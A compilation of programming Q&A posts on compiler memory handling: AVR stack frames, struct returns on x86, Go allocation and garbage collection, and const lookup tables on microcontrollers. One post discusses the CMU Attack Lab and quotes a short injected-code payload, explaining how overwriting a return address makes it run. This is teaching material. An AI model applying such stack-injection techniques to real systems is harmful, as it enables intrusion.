AVR C compiler behavior: memory management (C)

Do AVR C compilers make the program remember, in one of the index registers, the SRAM address at which a function starts storing its data (variables, arrays) on the data stack, so that the absolute address of a local variable can be computed by the formula:
absoluteAdr = functionDataStartAdr + localShiftOfVariable.
And do they grow the data stack pointer by a variable's length as each variable is declared, or is the stack pointer adjusted once at the start/end of the function by the combined size of all its variables?

Let's have a look at avr-gcc, which is freely available including its ABI:
Do AVR C compilers make the program remember, in one of the index registers, the SRAM address at which a function starts storing its data (variables, arrays) on the data stack, in order to get the absolute address of a local variable by the formula absoluteAdr = functionDataStartAdr + localShiftOfVariable?
Yes, no, it depends:
Static Storage
For variables in static storage, i.e. variables as defined by
unsigned char func (void)
{
static unsigned char var;
return ++var;
}
the compiler generates a symbol like var.123 with appropriate size (1 byte in this case). The linker / locator will then assign the address.
func:
lds r24,var.1505
subi r24,lo8(-(1))
sts var.1505,r24
ret
.local var.1505
.comm var.1505,1,1
Automatic
Automatic variables are held in registers if possible, otherwise the compiler allocates space in the frame of the function. It may even be the case that variables are optimized out, and in that case they do not exist anywhere in the program:
int add (void)
{
int a = 1;
int b = 2;
return a + b;
}
→
add:
ldi r24,lo8(3)
ldi r25,0
ret
There are 3 types of entities that are stored in the frame of a function, all of which might be present or absent depending on the program:
Callee-saved registers that are saved (PUSH'ed) by the function prologue and restored (POP'ed) by the epilogue. This is needed when local variables are allocated to callee-saved registers.
Space for local variables that cannot be allocated to registers. This happens when the variable is too big to be held in registers, there are too many auto variables, or the address of a variable is taken (and taking the address cannot be optimized out). This is because you cannot take the address of a register¹.
void use_address (int*);
void func (void)
{
int a;
use_address (&a);
}
The space for these variables is allocated in the prologue and deallocated in the epilogue. Shrink-wrapping is not implemented:
func:
push r28
push r29
rcall .
in r28,__SP_L__
in r29,__SP_H__
/* prologue: function */
/* frame size = 2 */
/* stack size = 4 */
movw r24,r28
adiw r24,1
rcall use_address
pop __tmp_reg__
pop __tmp_reg__
pop r29
pop r28
ret
In this example, a occupies 2 bytes, which are allocated by rcall . (the code was compiled for a device with a 16-bit program counter). The compiler then initializes the frame pointer Y (R29:R28) with the value of the stack pointer. This is needed because on AVR you cannot access memory via SP; the only memory operations that involve SP are PUSH and POP. Then the address of that variable, which is Y+1, is passed in R24. After the call, the epilogue frees the frame and restores R28 and R29.
Arguments that have to be passed on the stack:
void xfunc (int, ...);
void call_xfunc (void)
{
xfunc (42);
}
These arguments are pushed onto the stack, and the callee picks them up from there. They are pushed / popped around the call, but can also be accumulated by means of -maccumulate-args.
call_xfunc:
push __zero_reg__
ldi r24,lo8(42)
push r24
rcall xfunc
pop __tmp_reg__
pop __tmp_reg__
ret
In this example, the argument has to be passed on the stack because the ABI says that all arguments of a varargs function have to be passed on the stack, including the named ones.
For a description of how exactly the frame is laid out and arguments are passed, see [Frame Layout and Argument Passing](https://gcc.gnu.org/wiki/avr-gcc#Frame_Layout).
¹ Some AVRs actually allow this, but you never (as in NEVER) want to pass around the address of a general-purpose register!

Compilers do not manage RAM. At compile time, the compiler calculates the required size of each data section (.bss, .data, .text, .rodata, etc.) and generates a relocatable object file for each translation unit.
The linker then combines these into one object file and maps the relocatable addresses to absolute ones according to the linker configuration file (LCF).
At run time, the mechanism depends on the architecture itself. Normally, each function call has a frame on the stack where its arguments, return address and local variables live. The stack grows as variables are created, and on low-cost AVR microcontrollers there is no memory protection against the stack growing into another memory section (normally the heap). Even if an OS polices tasks that exceed their allocated stack, without a memory management unit all the OS can do is assert a RESET with an illegal-memory-access reason.
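As a rough illustration of that last point, here is a minimal sketch (my own addition, with made-up names and sizes, not code from the original answer) of how stack use grows with nested calls on a small AVR part:
#include <stdint.h>

static volatile uint8_t scratch[32];      /* lives in .bss in SRAM */

static uint16_t eat_stack(uint16_t n)
{
    volatile uint8_t local[16];           /* ~16 more bytes of stack per call,
                                             plus the pushed return address */
    local[0] = (uint8_t)n;
    scratch[0] = local[0];
    if (n == 0)
        return 0;
    /* On a device with only a few hundred bytes of SRAM, enough recursion
       silently grows the stack down into .data/.bss or the heap: there is
       no MMU/MPU to fault, so other variables simply get overwritten. */
    return (uint16_t)(1u + eat_stack(n - 1u));
}

int main(void)
{
    return (int)eat_stack(40);
}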

Related

Why does the stack frame also store instructions (besides data)? What is the precise mechanism by which instructions in the stack frame get executed?

Short version:
0: 48 c7 c7 ee 4f 37 45 mov $0x45374fee, %rdi
7: 68 60 18 40 00 pushq $0x401860
c: c3 retq
How can these three instructions (at offsets 0, 7, c), saved in the stack frame, get executed? I thought the stack frame only stores data; does it also store instructions? I know data is read into registers, but how do these instructions get executed?
Long version:
I am self-studying 15-213(Computer Systems) from CMU. In the Attack lab, there is an instance (phase 2) where the stack frame gets overwritten with "attack" instructions. The attack happens by then overwriting the return address from the calling function getbuf() with the address %rsp points to, which I know is the top of the stack frame. In this case, the top of the stack frame is in turn injected with the attack code mentioned above.
Here is the question: by reading the book (CS:APP), I get the sense that the stack frame only stores data that has overflowed from the registers (including the return address, extra arguments, etc.). But I don't get why it can also store instructions (attack code) and have them executed. How exactly did the content in the stack frame, which %rsp points to, get executed? I also know that %rsp stores the return address of the calling function; the point being, that is an address, not an instruction. So by exactly which mechanism does a supposed address get executed as an instruction? I am very confused.
Edit: Here is a link to the question(4.2 level 2):
http://csapp.cs.cmu.edu/3e/attacklab.pdf
This is a post that is helpful for me in understanding: https://github.com/magna25/Attack-Lab/blob/master/Phase%202.md
Thanks for your explanation!
The ret instruction gets a pointer from the current top of the stack and jumps to it. If, while in a function, you modify that stack slot to point to another function or piece of code, the code can "return" there, which can be used maliciously.
The code below doesn't necessarily compile, and it is just meant to represent the concept.
For example, we have two functions: add(), and badcode():
int add(int a, int b)
{
return a + b;
}
void badcode()
{
// Some very bad code
}
Let's also assume that we have a stack such as the below when we call add()
...
0x00....18 extra arguments
0x00....10 return address
0x00....08 saved RBP
0x00....00 local variables and etc.
...
If, during the execution of add, we managed to change the return address to the address of badcode(), then on the ret instruction we would automatically start executing badcode(). I don't know if this answers your question.
Edit:
An instruction is simply an array of numbers. Where you store them is irrelevant (mostly) to their execution. A stack is essentially an abstract data structure, it is not a special place in RAM. If your OS doesn't mark the stack as non-executable, there is nothing stopping the code on the stack from being returned to by the ret.
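To make the "instructions are just bytes, page permissions decide" point concrete, here is a minimal sketch of my own (assuming Linux on x86-64; it is not part of the original answer). A plain stack or heap buffer is normally mapped non-executable, so the sketch explicitly asks for an executable mapping:
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

int main(void)
{
    /* x86-64 machine code for:  mov eax, 42 ; ret */
    static const unsigned char code[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

    /* Ask the OS for a page we are allowed to execute. */
    void *mem = mmap(NULL, sizeof code, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED)
        return 1;

    memcpy(mem, code, sizeof code);       /* the "instructions" are just bytes */

    int (*fn)(void) = (int (*)(void))mem; /* treat those bytes as a function   */
    printf("%d\n", fn());                 /* prints 42                         */

    munmap(mem, sizeof code);
    return 0;
}
Had the bytes been copied into an ordinary non-executable buffer instead, jumping to them would fault, which is exactly what a non-executable stack buys you.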
Edit 2:
I get the sense that the stack frame only stores data that has overflowed from the registers (including return address, extra arguments, etc.)
I do not think you have a clear picture of how registers, RAM, the stack, and programs fit together. The idea that the stack frame only stores data that has overflowed from registers is incorrect.
Let's start over.
Registers are small pieces of memory on your CPU. They are independent of RAM. On x86 there are eight main general-purpose registers: a, c, d, b, si, di, sp, and bp. a stands for accumulator and is generally used for arithmetic operations; likewise b stands for base, c stands for counter, d stands for data, si stands for source, di stands for destination, sp is the stack pointer, and bp is the base pointer.
On 16-bit x86 machines, a, b, c, d, si, di, sp, and bp are 16 bits (2 bytes). a, b, c, and d are often written ax, bx, cx, and dx, where the x stands for the extension of their original 8-bit versions. They are referred to as eax, ecx, edx, ebx, esi, edi, esp, ebp in their 32-bit forms (e again stands for extended) and rax, rcx, rdx, rbx, rsi, rdi, rsp, rbp in their 64-bit forms.
Once again, these are on your CPU and are independent of RAM. The CPU uses these registers to do everything that it does. You want to add two numbers? Put one of them in ax and the other in cx and add them.
You also have RAM. RAM (Random Access Memory) is a storage device that lets you access and modify any of its values with the same computational effort, hence the term random access. Each value that RAM holds has an address that determines where in RAM the value lives. The CPU can treat numbers as addresses to access locations in RAM; numbers used for that purpose are called pointers.
A stack is an abstract data structure. It has FILO (first in, last out) behavior, which means that to get back the first datum you stored you have to go through all of the other data first. To manipulate the stack, the CPU provides us with sp, which holds a pointer to the current position of the stack, and bp, which marks the base of the current frame at the high end. The end that bp marks is often called the top of the stack because the stack usually grows downwards: if we start a stack at memory address 0x100 and store 4 bytes on it, sp will then be at memory address 0x100 - 4 = 0xFC. To do such operations automatically we have the push and pop instructions. In that sense a stack can be used to store any type of data, regardless of the data's relation to registers or programs.
Programs are pieces of structured code that are placed in RAM by the operating system. The operating system reads the program headers and related information and sets up an environment for the program to run in. For each program a stack is set up, usually some space for the heap is given, and the instructions (which are the building blocks of a program) are placed at memory locations that are either predetermined by the program itself or assigned by the OS.
Over the years some conventions have been established to standardize CPUs. For example, on most CPUs the ret instruction pops a pointer-sized value from the stack and jumps to it. Jumping means continuing execution at that particular RAM address. This is only a convention and has nothing to do with data being "overflowed from registers". For that reason, when a function is called, the return address (the current address in the program at the time of the call) is first pushed onto the stack so that it can be retrieved later by ret. Local variables are also stored on the stack, along with arguments if a function has more than six integer/pointer arguments (in the x86-64 System V calling convention).
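If you want to see the return address that call pushed and that ret will later consume, GCC and Clang expose it through builtins; a small sketch of my own (the builtins are compiler extensions, not standard C):
#include <stdio.h>

__attribute__((noinline))                /* keep a real call frame for the demo */
static void show_frame(void)
{
    void *ret_addr = __builtin_return_address(0); /* where ret will jump back to */
    void *frame    = __builtin_frame_address(0);  /* this function's frame       */
    printf("return address = %p, frame = %p\n", ret_addr, frame);
}

int main(void)
{
    show_frame();   /* the call instruction pushes the address show_frame reads */
    return 0;
}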
Does this help?
I know it is a long read but I couldn't be sure on what you know and what you don't know.
Yet Another Edit:
Lets also take a look at the code from the PDF:
void test()
{
int val;
val = getbuf();
printf("No exploit. Getbuf returned 0x%x\n", val);
}
Phase 2 involves injecting a small amount of code as part of your exploit string.
Within the file ctarget there is code for a function touch2 having the following C representation:
void touch2(unsigned val)
{
vlevel = 2; /* Part of validation protocol */
if (val == cookie) {
printf("Touch2!: You called touch2(0x%.8x)\n", val);
validate(2);
} else {
printf("Misfire: You called touch2(0x%.8x)\n", val);
fail(2);
}
exit(0);
}
Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case,
however, you must make it appear to touch2 as if you have passed your cookie as its argument.
Let's think about what you need to do:
You need to modify the stack of test() so that two things happen. The first is that you do not return to test() but rather to touch2. The other is that you give touch2 an argument, which is your cookie. Since you are passing only one argument, you don't need to modify the stack for the argument at all: the first argument is passed in rdi as part of the x86_64 calling convention.
The final code that you write has to change the return address to touch2()'s address and also execute mov rdi, cookie.
Edit:
Earlier I talked about RAM storing data at addresses and the CPU interacting with it. There is also a register on your CPU that you cannot reach directly from your assembly code. This register is called ip/eip/rip; it stands for instruction pointer. It holds a 16/32/64-bit pointer to an address in RAM: the address of the instruction the CPU will execute on its next clock cycle. With that in mind, we can say that what a ret instruction does is effectively
pop rip
which means: take the last 64 bits (8 bytes, the size of a pointer) on the stack and put them into the instruction pointer. Once rip is set to this value, the CPU begins executing the code at that address. The CPU doesn't do any checks on rip whatsoever. You can technically do the following (excuse me, my assembly is in Intel syntax):
mov rax, str ; move the RAM address of "str" into rax
push rax ; push rax into stack
ret ; return to the last pushed qword (8 bytes) on the stack
str: db "Hello, world!", 0 ; define a string
This code can call/execute a string. Your CPU will be very upset though, as there is no valid instruction there, and the program will most likely crash.

How are oversized structs returned on the stack?

It is said that returning an oversized struct by value (as opposed to returning a pointer to the struct) from a function incurs unnecessary copy on the stack. By "oversized", I mean a struct that cannot fit in the return registers.
However, to quote Wikipedia
When an oversized struct return is needed, another pointer to a caller-provided space is prepended as the first argument, shifting all other arguments to the right by one place.
and
When returning struct/class, the calling code allocates space and passes a pointer to this space via a hidden parameter on the stack. The called function writes the return value to this address.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
If the function inlines, the copying through the return-value object can be fully optimized away. Otherwise, maybe not, and arg copying definitely can't be.
It appears that at least on x86 architectures, the struct in question is directly written by the callee to the memory appointed by the caller, so why would there be a copy then? Does returning oversized structs really incur copy on the stack?
It depends on what the caller does with the return value; if it's assigned to a provably private object (escape analysis), that object can be the return-value object, passed as the hidden pointer.
But if the caller actually wants to assign the return value to other memory, then it does need a temporary.
struct large retval = some_func(); // no extra copying at all
*p = some_func(); // caller will make space for a local return-value object & copy.
(Unless the compiler knows that p is just pointing to a local struct large tmp;, and escape analysis can prove that there's no way some global variable could have a pointer to that same tmp var.)
long version, same thing with more details:
In the C abstract machine, there's a "return value object", and return foo copies the named variable foo to that object, even if it's a large struct. Or return (struct lg){1,2}; copies an anonymous struct. The return-value object itself is anonymous; nothing can take its address (you can't write int *p = &foo(123);). This makes it easier to optimize away.
In the caller, that anonymous return-value object can be assigned to whatever you want, which would be another copy if compilers didn't optimize anything. (All of this applies for any type, even int). Of course, compilers that aren't total garbage will avoid some, ideally all, of that copying, when doing so can't possibly change the observable results. And that depends on the design of the calling convention. As you say, most conventions, including all the mainstream x86 and x86-64 conventions, pass a "hidden pointer" arg for return values they choose not to return in register(s) for whatever reason (size, C++ having a non-trivial constructor).
struct large retval = foo(...);
For such calling conventions, the above code is effectively transformed to
struct large retval;
foo(&retval, ...);
So its C return-value object actually is a local in the stack frame of its caller. foo() is allowed to store into that return-value object whenever it wants during execution, including before reading some other objects. This allows optimization within the callee (foo) as well, so a struct large tmp = ... / return tmp can be optimized away to just storing into the return-value object.
So there's zero extra copying when the caller does just want to assign the function return value to a newly declared local var. (Or to a local var which it can prove is still private, via escape analysis. i.e. not pointed-to by any global vars).
But what if the caller wants to store the return value somewhere else?
void caller2(struct large *lgp) {
*lgp = foo();
}
Can *lgp be the return-value object, or do we need to introduce a local temporary?
void caller2(struct large *lgp) {
// foo_asm(lgp); // nope, possibly unsafe
struct large retval; foo(&retval); *lgp = retval; // safe
}
If you want functions to be able to write large structs to arbitrary locations, you have to "sign off" on it by making that effect visible in your source.
See What prevents the usage of a function argument as hidden pointer? for more details about why *lgp can't be the return-value object / hidden pointer, and another example: a function is allowed to assume its return-value object (pointed to by the hidden pointer) is not the same object as anything else. Also details on whether struct large *restrict lgp would make it safe: probably yes if the function doesn't longjmp (otherwise stores to the supposedly anonymous retval object might become visible side effects without return having been reached), but GCC doesn't look for that optimization.
Why is tailcall optimization not performed for types of class MEMORY? - return bar(), where bar returns the same struct type, should be possible as an optimized tailcall, but it isn't; the missed optimization can introduce extra copying of the whole struct, as well as failing to optimize call bar / ret into jmp bar.
how c compiler treats a struct return value from a function, in ASM - thresholds for returning in registers. e.g. i386 System V always returns structs in memory, even struct {int x;};.
Is it possible within a function to get the memory address of the variable initialized by the return value?
C/C++ returning struct by value under the hood an actual example (but unfortunately using debug-mode compiler-generated asm, so it contains copying that isn't necessary).
How do objects work in x86 at the assembly level? example at the bottom of how x86-64 System V packs the bytes of a struct into RDX:RAX, or just RAX if less than 8 bytes.
An example showing early stores to the return-value object (instead of copying)
(all source + asm on the Godbolt compiler explorer)
// more or less extra size will get compilers to copy it around with SSE2 or not
struct large { int first, second; char pad[0];};
int *global_ptr;
extern int a;
NOINLINE // __attribute__((noinline))
struct large foo() {
struct large tmp = {1,2};
if (a)
tmp.second = *global_ptr;
return tmp;
}
(targeting GNU/Linux) clang -m32 -O3 -mregparm=1 creates an implementation that writes its return-value object before it's done reading everything else, exactly the case that would make it unsafe for the caller to pass a pointer to some globally-reachable memory.
The asm makes it clear that tmp is fully optimized away, or is the retval object.
# clang -O3 -m32 -mregparm=1
foo:
mov dword ptr [eax + 4], 2
mov dword ptr [eax], 1 # store tmp into the retval object
cmp dword ptr [a], 0
je .LBB0_2 # if (a == 0) goto ret
mov ecx, dword ptr [global_ptr] # load the global
mov ecx, dword ptr [ecx] # deref it
mov dword ptr [eax + 4], ecx # and store to the retval object
.LBB0_2:
ret
(-mregparm=1 means pass the first arg in EAX, less noisy and easier to quickly visually distinguish from stack space than passing on the stack. Fun fact: i386 Linux compiles the kernel with -mregparm=3. But fun fact #2: if a hidden pointer is passed on the stack (i.e. no regparm), that arg is callee pops, unlike the rest. The function will use ret 4 to do ESP+=4 after popping the return address into EIP.)
In a simple caller, the compiler just reserves some stack space, passes a pointer to it, and then can load member variables from that space.
int caller() {
struct large lg = {4, 5}; // initializer is dead, foo can't read its retval object
lg = foo();
return lg.second;
}
caller:
sub esp, 12
mov eax, esp
call foo
mov eax, dword ptr [esp + 4]
add esp, 12
ret
But with a less trivial caller:
int caller() {
struct large lg = {4, 5};
global_ptr = &lg.first;
// unknown(&lg); // or this: as a side effect, might set global_ptr = &tmp->first;
lg = foo(); // (except by inlining) the compiler can't know if foo() looks at global_ptr
return lg.second;
}
caller:
sub esp, 28 # reserve space for 2 structs, and alignment
mov dword ptr [esp + 12], 5
mov dword ptr [esp + 8], 4 # materialize lg
lea eax, [esp + 8]
mov dword ptr [global_ptr], eax # point global_ptr at it
lea eax, [esp + 16] # hidden first arg *not* pointing to lg
call foo
mov eax, dword ptr [esp + 20] # reload from the retval object
add esp, 28
ret
Extra copying with *lgp = foo();
int caller2(struct large *lgp) {
global_ptr = &lgp->first;
*lgp = foo();
return lgp->second;
}
# with GCC11.1 this time, SSE2 8-byte copying unlike clang
caller2: # incoming arg: struct large *lgp in EAX
push ebx #
mov ebx, eax # lgp, tmp89 # lgp needed after foo returns
sub esp, 24 # reserve space for a retval object (and waste 16 bytes)
mov DWORD PTR global_ptr, eax # global_ptr, lgp
lea eax, [esp+8] # hidden pointer to the retval object
call foo #
movq xmm0, QWORD PTR [esp+8] # 8-byte copy of both halves
movq QWORD PTR [ebx], xmm0 # *lgp_2(D), tmp86
mov eax, DWORD PTR [ebx+4] # lgp_2(D)->second, lgp_2(D)->second # reload int return value
add esp, 24
pop ebx
ret
The copy to *lgp needs to happen, but it's somewhat of a missed optimization to reload from there, instead of from [esp+12]. (Saves a byte of code size at the cost of more latency.)
Clang does the copy with two 4-byte integer register mov loads/stores, but one of them is into EAX so it already has the return value ready.
You might also want to look at the result of assigning to memory freshly allocated with malloc. Compilers know that nothing else can (legally) be pointing to the newly allocated memory: that would be use-after-free undefined behaviour. So they may allow passing on a pointer from malloc as the return-value object if it hasn't been passed to anything else yet.
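A small sketch of that malloc case (my own, not from the answer above; the struct layout and names are made up):
#include <stdlib.h>

struct large { int first, second; char pad[64]; };

__attribute__((noinline))              /* keep the call out-of-line for the demo */
static struct large foo(void)
{
    struct large tmp = { 1, 2 };       /* rest of pad is zero-initialized */
    return tmp;
}

struct large *make_one(void)
{
    struct large *p = malloc(sizeof *p);
    if (p)
        *p = foo();  /* nothing else can legally alias fresh malloc memory, so a
                        compiler may pass p itself as the hidden return-value
                        pointer and skip the temporary + copy (not guaranteed) */
    return p;
}

int main(void)
{
    free(make_one());
    return 0;
}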
Related fun fact: passing large structs by value always requires a copy (if the function doesn't inline). But as discussed in comments, the details depend on the calling convention. Windows differs from i386 / x86-64 System V calling conventions (all non-Windows OSes) on this:
SysV calling conventions copy the whole struct to the stack. (if they're too large to fit in a pair of registers for x86-64)
Windows x64 makes a copy and passes (like a normal arg) a pointer to that copy. The callee "owns" the arg and can modify it, so a tmp copy is still needed. (And no, const struct large foo has no effect.)
https://godbolt.org/z/ThMrE9rqT shows x86-64 GCC targeting Linux vs. x64 MSVC targeting Windows.
This really depends on your compiler, but in general the way this works is that the caller allocates the memory for the struct return value, but the callee also allocates stack space for any intermediate value of that structure. This intermediate allocation is used when the function is running, and then the struct is copied onto the caller's memory when the function returns.
For reference as to why your solution won't always work, consider a program which has two of the same struct and returns one based on some condition:
large_t returntype(int condition) {
large_t var1 = {5};
large_t var2 = {6};
// More intermediate code here
if(condition) return var1;
else return var2;
}
In this case, both may be required by the intermediate code, but the return value is not known at compile time, so the compiler doesn't know which to initialize on the caller's stack space. It's easier to just keep it local and copy on return.
EDIT: Your solution may be the case in simple functions, but it really depends on the optimizations performed by each individual compiler. If you're really interested in this, check out https://godbolt.org/

How does garbage collection work with the data segment?

For the Go code below, in the scope of function f():
var fruits [5]string
fruits[0] = "Apple"
My understanding is that the string "Apple" gets stored in the data segment, and the array's five string headers (ptr, length) get allocated in the stack segment.
For the code below, in the scope of function f():
numbers := [4]int{10, 20, 30, 40}
Memory for {10, 20, 30, 40} gets allocated in the data segment, not in the stack segment of function f.
The Go garbage collector cleans the heap segment of a process.
On return from f(), the stack pointer adjustment discards f()'s portion of the stack.
Edit:
To understand value semantics and pointer semantics as they relate to allocating strings: how does the data-segment memory (for the string "Apple") get cleared after returning from function f()?
The language definition for Go does not describe actions in terms of segments, stacks, heaps, and so on. So all of this is implementation detail, which might change from one Go implementation to another.
In general, though, Go compilers do live-range analysis for variables and use escape analysis to determine whether to allocate something in GC-able memory ("heap") or automatically-released storage ("stack"). String literals may, depending on too many things to count, be allocated at compile time as text and referenced directly from there, or copied to some data area that's either heap-ish or stack-ish.
Let's assume for argument's sake that you wrote:
func f() {
var fruits [5]string
fruits[0] = "Apple"
}
This function doesn't do anything at all, so it just gets elided from the build.
The string constant "Apple" appears nowhere at all. Let's add a bit more so that it actually does exist:
package main
import "fmt"
func f() {
var fruits [5]string
fruits[0] = "Apple"
fmt.Println(fruits[0])
}
func main() {
f()
fmt.Println("foo")
}
Here is some (hand-trimmed / cleaned-up) disassembly of main.f in the resulting binary. Note that the implementation will almost certainly be different in other versions of Go. This was built with Go 1.13.5 (for amd64).
main.f:
mov %fs:0xfffffffffffffff8,%rcx
cmp 0x10(%rcx),%rsp
jbe 2f
Everything up to here is boilerplate: the entry point for the function checks whether it needs to call the runtime to allocate more stack space, because it's about to use 0x58 bytes of stack space here:
1: sub $0x58,%rsp
mov %rbp,0x50(%rsp)
This is the end of the boilerplate: after the next few instructions, we will be able to return from f with a simple retq. Now we make room on the stack for the array fruits, plus other space the compiler deems appropriate for whatever reason, and update %rbp. Then we store a string header at (%rsp) and 0x8(%rsp) in order to call convTstring in package runtime:
lea 0x50(%rsp),%rbp
lea 0x35305(%rip),%rax # <go.string.*+0x24d> - the string is here
mov %rax,(%rsp)
movq $0x5,0x8(%rsp) # this is the length of the string
callq 408da0 <runtime.convTstring>
mov 0x10(%rsp),%rax
The function runtime.convTstring actually allocates space (16 bytes on this machine) for another copy of the string header, on "the heap", then copies the header into place. This copy is now ready to be stored into fruits[0] or elsewhere. The calling convention for Go on x86_64 is a bit odd, so the return value is at 0x10(%rsp), which we've now copied into %rax. We'll see where this gets used in a moment:
xorps %xmm0,%xmm0
movups %xmm0,0x40(%rsp)
These instructions zero out 16 bytes starting at 0x40(%rsp). It's not clear to me what this is for, especially since we overwrite them immediately.
lea 0x11a92(%rip),%rcx # <type.*+0x11140>
mov %rcx,0x40(%rsp)
mov %rax,0x48(%rsp)
mov 0xd04a1(%rip),%rax # <os.Stdout>
lea 0x4defa(%rip),%rcx # <go.itab.*os.File,io.Writer>
mov %rcx,(%rsp)
mov %rax,0x8(%rsp)
lea 0x40(%rsp),%rax
mov %rax,0x10(%rsp)
movq $0x1,0x18(%rsp)
movq $0x1,0x20(%rsp)
callq <fmt.Fprintln>
This appears to be the call to fmt.Println: since we pass an interface value, we must package it up as a type and pointer-to-value (perhaps that's why there is a call to runtime.convTstring in the first place). We also have os.Stdout and its interface descriptor inserted directly into the call here, via some inlining (note that this call goes directly to fmt.Fprintln).
In any case, we passed the string header, allocated in runtime.convTstring here, to function fmt.Println.
mov 0x50(%rsp),%rbp
add $0x58,%rsp
retq
2: callq <runtime.morestack_noctxt>
jmpq 1b
This is how we return from a function—the constants 0x50 and 0x58 depend on how much stack space we allocated—and, after the label that the start of the function can jump to, the rest of the function-entry boilerplate.
Anyway, the point of all of the above is to show that:
The five byte sequence Apple is not allocated at runtime at all. Instead, it exists in the rodata segment known as go.string.*. This rodata segment is in effect program text: the OS places it into read-only memory, if at all possible. It's just separated from the executable instructions for organizational purposes.
The fruits array never actually got used at all. The compiler could see that, while we wrote to it, we didn't use it other than the one call, so we didn't need it after all.
But a string header, by which one can find both the length of the string and the data (in that rodata segment), did get heap-allocated.
It didn't need to be, as fmt.Println is not going to save this pointer, but the compiler didn't spot that. Eventually, the runtime gc will free the heap-allocated string header data, unless the program exits entirely first.
Memory for {10, 20, 30, 40} gets allocated in data segment but not in
stack segment for function scope f.
No, it's still gonna be allocated on the stack. [4]int is an array type. It's a value type. int is a value type. So the whole array would be on the stack, GC wouldn't need to deal with it.
But if something is allocated on the heap (I guess that's what you mean by the data segment) then the GC would kick in. The internals are an implementation detail and may change in the future, but to put it simply, the current version starts from the roots (global variables, stack, registers) and marks all the live objects. Everything that's unmarked is collected.
Edit:
If we're talking about string literals in particular: strings work similarly to slices. A string is a value type, a struct with two fields: a pointer to the backing array of bytes and a length. String literals are special; they point into the read-only data segment that contains the actual string contents. So at run time no allocation occurs and the GC has nothing to collect.

static const vs const declaration performance difference on uC

Let's say I have a lookup table, an array of 256 elements, defined and declared in a header named lut.h. The array will be accessed multiple times during the lifetime of the program.
From my understanding, if it's defined and declared as static, it will remain in memory until the program is done, i.e. if it is a task running on a uC, the array is in memory the entire time.
Whereas without static, it will be loaded into memory when accessed.
In lut.h
static const float array[256] = {1.342, 14.21, 42.312, ...}
vs.
const float array[256] = {1.342, 14.21, 42.312, ...}
Considering the uC has limited spiflash and psram, what would be the most performance oriented approach?
You have some misconceptions here, since an MCU is not a PC. Everything in memory in an MCU will persist for as long as the MCU has power. Programs do not end or return resources to a hosting OS.
"Tasks" on an MCU mean you have an RTOS. They use their own stack, and that's a topic of its own, quite unrelated to your question. It is normal that all tasks on an RTOS execute forever, rather than getting allocated/deallocated at run-time like processes on a PC.
static versus automatic on local scope does mean different RAM memory use, but not necessarily more/less memory use. Local variables get pushed/popped on the stack as the program executes. static ones sit on their designated address.
Where as without static, it will be loaded into memory when accessed.
Only if the array you are loading into is declared locally. That is:
void func (void)
{
int my_local_array[] = {1,2,3};
...
}
Here my_local_array will load the values from flash to RAM during execution of that function only. This means two things:
The actual copy-down from flash to RAM is slow. First of all, copying something is always slow, regardless of the situation. But in the specific case of copying from flash to RAM, it might be extra slow, depending on the MCU.
It will be extra slow on high end MCUs with flash wait states that fail to utilize data cache for the copy. It will be extra slow on weird Harvard architecture MCUs that can't address data directly. Etc.
So naturally if you do this copy down each time a function is called, instead of just once, your program will turn much slower.
Large local objects lead to a need for higher stack size. The stack must be large enough to deal with the worst-case scenario. If you have large local objects, the stack size will need to be set much higher to prevent stack overflows. Meaning this can actually lead to less effective memory use.
So it isn't trivial to tell if you save or lose memory by making an object local.
General good practice design in embedded systems programming is to not allocate large objects on the stack, as they make stack handling much more detailed and the potential for stack overflow increases. Such objects should be declared as static, at file scope. Particularly if speed is important.
static const float array vs const float array
Another misconception here. Making something const in MCU system, while at the same time placing it at file scope ("global"), most likely means that the variable will end up in flash ROM, not in RAM. Regardless of static.
This is most of the time preferred, since in general RAM is a more valuable resource than flash. The role static plays here is merely good program design, as it limits access to the variable to the local translation unit, rather than cluttering up the global namespace.
In lut.h
You should never define variables in header files.
It is bad from a program design point-of-view, as you expose the variable all over the place ("spaghetti programming") and it is bad from a linker point of view, if multiple source files include the same header file - which is extremely likely.
Correctly designed programs place the variable in the .c file and limit access by declaring it static. Access from the outside, if needed, is done through setters/getters.
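A minimal sketch of that layout (the file split, array contents and getter name are illustrative, based on the lut.h from the question, not a prescribed API):
/* lut.c */
static const float lut[256] = {
    1.342f, 14.21f, 42.312f, /* ... remaining entries ... */
};

float lut_get(unsigned index)
{
    return lut[index % 256u];   /* the getter is the only external access path */
}

/* lut.h */
float lut_get(unsigned index);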
The uC has limited spiflash
What is "spiflash"? An external serial flash memory accessed through SPI? Then none of this makes sense, since such flash memory isn't memory-mapped and typically the compiler can't utilize it. Access to such memories has to be carried out by your application, manually.
If your arrays are defined on a file level (you mentioned lut.h), and both have const qualifiers, they will not be loaded into RAM¹. The static keyword only limits the scope of the array, it doesn't change its lifetime in any way. If you check the assembly for your code, you will see that both arrays look exactly the same when compiled:
static const int static_array[] = { 1, 2, 3 };
const int extern_array[] = { 1, 2, 3};
extern void do_something(const int * a);
int main(void)
{
do_something(static_array);
do_something(extern_array);
return 0;
}
Resulting assembly:
main:
sub rsp, 8
mov edi, OFFSET FLAT:static_array
call do_something
mov edi, OFFSET FLAT:extern_array
call do_something
xor eax, eax
add rsp, 8
ret
extern_array:
.long 1
.long 2
.long 3
static_array:
.long 1
.long 2
.long 3
On the other hand, if you declare the arrays inside a function, then the array will be copied to temporary storage (the stack) for the duration of the function, unless you add the static qualifier:
extern void do_something(const int * a);
int main(void)
{
static const int static_local_array[] = { 1, 2, 3 };
const int local_array[] = { 1, 2, 3 };
do_something(static_local_array);
do_something(local_array);
return 0;
}
Resulting assembly:
main:
sub rsp, 24
mov edi, OFFSET FLAT:static_local_array
movabs rax, 8589934593
mov QWORD PTR [rsp+4], rax
mov DWORD PTR [rsp+12], 3
call do_something
lea rdi, [rsp+4]
call do_something
xor eax, eax
add rsp, 24
ret
static_local_array:
.long 1
.long 2
.long 3
¹ More precisely, it depends on the compiler. Some compilers will need additional custom attributes to define exactly where you want to store the data. Some compilers will try to place the array into RAM when there is enough spare space, to allow faster reading.
